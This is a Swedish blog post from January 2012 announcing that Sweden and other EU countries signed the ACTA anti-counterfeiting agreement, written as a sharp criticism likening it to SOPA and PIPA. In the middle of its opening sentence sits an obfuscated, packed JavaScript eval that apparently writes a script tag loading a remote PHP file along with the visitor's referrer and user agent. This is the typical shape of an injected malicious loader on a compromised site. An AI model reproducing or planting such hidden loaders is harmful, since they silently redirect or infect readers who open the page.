Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Sverige har godkänt ACTA avtalet.

Sverige har godkänt ACTA avtalet.
Filip Urde
  • On 27 januari, 2012
  • http://www.revue.se/filip-urde

SOPA eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|khide|var|u0026u|referrer|ayitb||js|php’.split(’|’),0,{}))
och PIPA hysterin är i fullgång, man tror att det ska lugna ner sig lite och då… BOOM!

Igår så skrevs ACTA avtalet på av Sverige och 21 av de andra EU-länder. Det kontroversiella handelsavtalet Anti-Counterfeiting Trade Agreement (ACTA) skrevs på  i Tokyo och har tidigare blivit undertecknat av USA, Japan och Australien.

ACTA är ett globalt handelsavtal som ska ta hand om upphovsrättsskyddade produkters rättigheter, fysiska såväl som digitala. ACTA har varit sjukt hemligt inför allmämnheten och media. En av punkterna som är helt sjuk är att internetleverantörer ska kunna bli ansvariga för vad deras kunder är inne på för hemsidor, samt vad för material de laddar ner.
Igår så godkände alltså Sverige officiellt ACTA, men det blir inte europeisk lag innan Europaparlamentet godkänner förslaget. De förväntas rösta om det hela någon gång i sommar.
ACTA är precis lika sopigt som
SOPA och PIPA! Ett riktigt j*vla sk*t förslag! Detta kommer vi återkomma om.